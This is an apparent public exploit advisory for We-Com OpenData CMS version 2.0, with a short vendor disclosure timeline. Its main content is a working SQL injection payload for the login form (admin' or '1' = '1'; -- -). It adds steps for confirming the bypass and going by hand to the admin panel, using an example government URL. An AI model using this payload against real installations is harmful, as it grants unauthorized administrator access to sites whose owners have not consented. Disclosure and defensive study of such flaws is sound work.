We-Com OpenData CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64
---------------------------------------------------------
Vendor contact timeline:
2020-05-05: Contacting vendor through [email protected]
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory
Authentication Bypass / SQL Injection in the opendata 2.0 CMS
PoC:
Payload(s)
USERNAME: admin' or '1' = '1'; -- -
PASSWORD: vvv
The SQL injection attack results in a bypass of the login. To confirm, you will get a response in the header of the page with "okokokokokokokokokokokokokok".
It will not redirect you to the control panel, so you will need to browse to it manually:
https://www.site.gov.it/admin/?mod=mod_admin
We are now authenticated as "adminstrator".